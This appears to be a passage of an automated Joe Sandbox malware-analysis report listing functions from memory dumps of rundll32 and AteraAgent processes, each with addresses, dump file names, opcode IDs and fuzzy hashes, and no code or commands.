                                                                                                                                                                                                                                          • Instruction ID: 0708148c3f82fdca5747098fde100a1527b54be4f5e5638110b58a940cd6cfab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b2f88848dc4c56fb5bb5cfa614daf58857eacd2a2950c05dba70f81add56f4d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38119135600219EFDB04CFE4E464AAA7BB6EFCC311F115019D50AA73A0CF79AD85DB90
                                                                                                                                                                                                                                          Function 04FE1829 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4717a0b6f8b8d5b62916091dfbdf64040d4ff84325b97af2fc440a8702502be3
                                                                                                                                                                                                                                          • Instruction ID: 9f3b52012594e4a9c4c2011227a4dedc3480d3655bc2ea8642c3852742c031c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4717a0b6f8b8d5b62916091dfbdf64040d4ff84325b97af2fc440a8702502be3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D012631B002188BEB14BAAA95657FF3BB69BC8705F140039C101B7380CEB11D0397D1
                                                                                                                                                                                                                                          Function 033AD006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1901818784.00000000033AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033AD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_33ad000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 90a34f9dc78226b1f55408d38459d2449f02da4eb2207b485fcaf9c3d950e651
                                                                                                                                                                                                                                          • Instruction ID: f46099602668d50a0fecbc7227ecae5325d6b572ace6edef5d255fa8e4c25e5c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90a34f9dc78226b1f55408d38459d2449f02da4eb2207b485fcaf9c3d950e651
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28018C6140D3C09FE7128B298CA8752BFA8EF53220F0984CBE8888F1A7C26C5C45D772
                                                                                                                                                                                                                                          Function 04FE2A68 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3491a1681f2a2efb2f07b8935e69c05af44602593b3d48278d0906f5bf90def2
                                                                                                                                                                                                                                          • Instruction ID: 4f244726d41dc564d629c413661fe3b653528f15dd99d734803e3032bce562cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3491a1681f2a2efb2f07b8935e69c05af44602593b3d48278d0906f5bf90def2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE018475B002218FC704EF78E5506AE37F2EB8C715B204079E909D7360EB349A83CB80
                                                                                                                                                                                                                                          Function 033AD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1901818784.00000000033AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033AD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_33ad000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ab3c566a59f4a1180eb13424565d35be4d042b6863717d3a6ec0ca81f1677af9
                                                                                                                                                                                                                                          • Instruction ID: 2683db69db8c6a784d503563121dabf661a712dbe60d1b6a812e654df1579435
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab3c566a59f4a1180eb13424565d35be4d042b6863717d3a6ec0ca81f1677af9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C501F271008B409AE720CA2DCCC4B66FFDCEF51325F0CC45AED490BA82C27C9841D6B1
                                                                                                                                                                                                                                          Function 04FE2997 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a255f7f7dd5cdb9223d59705b89d7daf1cd0bf9f2c0f55794811b67c53dd5946
                                                                                                                                                                                                                                          • Instruction ID: 6454000b043885be8eb49ba4b92bad4581f42ec963d0f7351cb569d88548f257
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a255f7f7dd5cdb9223d59705b89d7daf1cd0bf9f2c0f55794811b67c53dd5946
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F028346023108FD719AB71E9846993B62EB40712701847EE5068F591EE75DCC75792
                                                                                                                                                                                                                                          Function 04FE1BB0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8eb05e82e33c392565d67256bdfd5819eca32c5d47860d9b890f3d8a29f5eb9b
                                                                                                                                                                                                                                          • Instruction ID: ac9f1058f4cfdc761ca66272bd69227151d79ffde7d4dd34ef2d27f360b4ebee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8eb05e82e33c392565d67256bdfd5819eca32c5d47860d9b890f3d8a29f5eb9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14F05935F053501BD7205A6BA58477B7B1ADBC5162F05407ADD18CB201EA749C0382D0
                                                                                                                                                                                                                                          Function 04FE2A78 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 248880c73c54158bb436095edba21011968a11ae8139d98dc216f2d18aafe5c4
                                                                                                                                                                                                                                          • Instruction ID: e65ec71c0dbdb2c5e44ba04c046461081ea3c294dca33ed5efc2c0e92ad05be7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248880c73c54158bb436095edba21011968a11ae8139d98dc216f2d18aafe5c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8018175B002158FCB04EF78D50466E77F6EF8C615B100079EA09D7320EB719E82CB80
                                                                                                                                                                                                                                          Function 04FE1431 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5d32a8557a8f82d9ba2b6424a7824e3bffba7b6aab66a9cd043789453282e9dc
                                                                                                                                                                                                                                          • Instruction ID: f8594d4d8d4d0536af5a92406af9b7e6cdb83f512108f09b936b5dea89c04d6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d32a8557a8f82d9ba2b6424a7824e3bffba7b6aab66a9cd043789453282e9dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FF096B5A0520A5FD7089FF665661263B99EFD2212316192DC50ACF2B1F9389A0687D0
                                                                                                                                                                                                                                          Function 04FE29A8 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2e66b77c45bbaf46344690354d8c9e267766cd9c9f707cfbc7ee92c11ff6d4c1
                                                                                                                                                                                                                                          • Instruction ID: 5018db2118e5396ea384ccd9bb3a0d704dfb80bd64611bdf00a64067d34c6061
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e66b77c45bbaf46344690354d8c9e267766cd9c9f707cfbc7ee92c11ff6d4c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0B434B013108BD719EB75E94466A3796EB80712701842AE2068F264EF75E8C297D2
                                                                                                                                                                                                                                          Function 04FE2A20 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 208242c623f9dcf108c987d5fa1e6ebf82e40876b77aea67728df1d554a0ee39
                                                                                                                                                                                                                                          • Instruction ID: 1b55ca8e985ff33d04e8385de197bf2dea8b99b32db446b830cab0cf68f655c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 208242c623f9dcf108c987d5fa1e6ebf82e40876b77aea67728df1d554a0ee39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AE0203178B2788FD71505B274151FE3B9CDF43A1234740A7E405C11A1EB0C8D835342
                                                                                                                                                                                                                                          Function 04FE5EB0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d4d5ab163abbad24a2b28acc932d68afc80dcd99e7099225514bbf2786f368fa
                                                                                                                                                                                                                                          • Instruction ID: 92f4f6797905e6760aa693508c7a8734ec4054a090c3e398912b71a249a8717d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4d5ab163abbad24a2b28acc932d68afc80dcd99e7099225514bbf2786f368fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8E0C2323562100FD7015228E0514D43B78DB0B628B1200A7E149CB762C5418C034385
                                                                                                                                                                                                                                          Function 04FE2959 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f140db6fc3aaf957f0c03fe8d7976dbaad3699929cb4a792c0e6ec760cf2829e
                                                                                                                                                                                                                                          • Instruction ID: e95c0ae1a04629b5b357448ed76e6bfd3444fade4a1d78f1a6f08db50f273021
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f140db6fc3aaf957f0c03fe8d7976dbaad3699929cb4a792c0e6ec760cf2829e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E086B58062059FCB00CFB0E99158D7FB5DF49204720C5E6D858E7266EA304F538781
                                                                                                                                                                                                                                          Function 04FE2A30 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7164b4a97c652f84e363954cdad85182eb2b11445d2d03d7edd6cea499ecb12c
                                                                                                                                                                                                                                          • Instruction ID: f25fb81fbd213d1997310a088aea423e1a4b8b03105ea5131b4cc4249c8fb27b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7164b4a97c652f84e363954cdad85182eb2b11445d2d03d7edd6cea499ecb12c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03D02B3174312C87DB1819B774042BE359CDB42E527830065F40AC2280FF0CDDC35386
                                                                                                                                                                                                                                          Function 04FE17F0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b48f78d8c5b681abd437ca8d01f5b568a4c432ce79685cd539665c5931be1d55
                                                                                                                                                                                                                                          • Instruction ID: 0cc2eb7f6149d17f9063810b24c59a8d6943be858d58a337d9b459ae3b16d76d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b48f78d8c5b681abd437ca8d01f5b568a4c432ce79685cd539665c5931be1d55
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FD02E3322A2301FC305A764F84A0A47F7AEB06160308807BE9098B676DDA00C97C3E0
                                                                                                                                                                                                                                          Function 04FE0C48 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9db0cd5ad33428df78d2bca923ea03c58ea48bbe8e094d20dcc43e0eb3d978de
                                                                                                                                                                                                                                          • Instruction ID: 8ed9b82310408775af48fcaaf480a081b73eb01a87156b6099cca069c8e11b1d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9db0cd5ad33428df78d2bca923ea03c58ea48bbe8e094d20dcc43e0eb3d978de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75D0A7313602246BD204525CD450979379DDB8A729B00085AF10DC7320C951FC020789
                                                                                                                                                                                                                                          Function 04FE0C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 164129e0272c711c4f0b7eedb59e4915f82765b31a6b45a054bf9192222ed645
                                                                                                                                                                                                                                          • Instruction ID: 627ce688bad71a842c699eda917249b46a959b709f39fb334a385024e5660ba2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 164129e0272c711c4f0b7eedb59e4915f82765b31a6b45a054bf9192222ed645
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2D0A7333101286B5304665ADC4997A7BABEB943A23504423F90583320DD707C528395
                                                                                                                                                                                                                                          Function 04FE0440 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ffa96807639bd5bceb2b7a005d7ea01680b9e2168d25c531b92ff0b2fc3130e2
                                                                                                                                                                                                                                          • Instruction ID: 1d4c7688d8ef4c98799de3ade6aa6d4097c31d8a7f666643894f1e00561fea1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa96807639bd5bceb2b7a005d7ea01680b9e2168d25c531b92ff0b2fc3130e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7C08CEBBE9B845FE302008C1C920EA2760EAF2208BCE80A2C08494813705622278160
                                                                                                                                                                                                                                          Function 04FE2968 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 308dec24a084a3fe689d8e170d7f33b6081e99c724b445b824df1d7150426534
                                                                                                                                                                                                                                          • Instruction ID: 96bf2c7edcd878ee9770bdf86754b55eed4a8dfdb2bbb9e27dbddb962779da27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 308dec24a084a3fe689d8e170d7f33b6081e99c724b445b824df1d7150426534
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16D05E74901209DFCB00DFB4E94495DBBFAEB48201B20C6A5D808E3214EA305E908BC1
                                                                                                                                                                                                                                          Function 04FE0E7C Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000003.1901146384.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_3_4fe0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 316f49ac171c8def47f5b99bd029e5e40d531ad861860cd7ee891a1e7ccf0504
                                                                                                                                                                                                                                          • Instruction ID: ee850a546951e0dd8af91f049f520be5962fc783b1d42ff731c43ad603133028
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 316f49ac171c8def47f5b99bd029e5e40d531ad861860cd7ee891a1e7ccf0504
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBB01286A54101167108A6374CE497A04C2DBC0306BC4CC011401600145C64F0031005

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FFD9B3DC922 Relevance: .5, Instructions: 517COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6d9a7162824fc4136e8de82d07879705ac34ffa1bc8409f334441b5795eed0f3
                                                                                                                                                                                                                                          • Instruction ID: 8f875db38f7eb7457c347ed6105bc4b806b43b497d3ded4b2b2ce660a7cb229f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d9a7162824fc4136e8de82d07879705ac34ffa1bc8409f334441b5795eed0f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3902C270A19A4D8FEBA8EF68C8657E937D1FF94310F44432ED84DC72A1CE35A9458B81
                                                                                                                                                                                                                                          Function 00007FFD9B3D172D Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 94c9a94e8f390cec928a3e5285912f45054ec08eb530ae3d5ba45828313430e1
                                                                                                                                                                                                                                          • Instruction ID: db18a4cbf6bc01b39a2b8b4573b0f49bbe731334e55165ae5c1e7adc0c5d903f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94c9a94e8f390cec928a3e5285912f45054ec08eb530ae3d5ba45828313430e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7316D70E1991D8FDBA9EF44C4A07E9B3B1FF98300F5142ADD01D93295CA356A81CF40
                                                                                                                                                                                                                                          Function 00007FFD9B3D1A34 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5ed17c20ecc64589d9908c2ee757579e440e602a6f8f502e9ade1475eaa0d2a4
                                                                                                                                                                                                                                          • Instruction ID: fd23461aff9fb3d348a652894344f0cac78db89be07a4a5dd3dd57194c16ffd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ed17c20ecc64589d9908c2ee757579e440e602a6f8f502e9ade1475eaa0d2a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7015230D4E25A8BD365EFA080613F8F2B0AF47700F41257CD00D671A2CA799A80DA08
                                                                                                                                                                                                                                          Function 00007FFD9B3D1FAC Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2e4b8ccd30b99b47569e5d6f70f61faad55aed4f561c94afe6659bebe9cd935e
                                                                                                                                                                                                                                          • Instruction ID: 776260cd9db6e1aa5b88cd2db27dccebab7b86a17e939de2559c7920672014a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e4b8ccd30b99b47569e5d6f70f61faad55aed4f561c94afe6659bebe9cd935e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F018C31E4551D9BE7A5EF68C8A13F8B2B1EF80A00F4541B9E01D922A2CE352FC5CF00
                                                                                                                                                                                                                                          Function 00007FFD9B3D596C Relevance: 1.6, Strings: 1, Instructions: 386COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: O_^
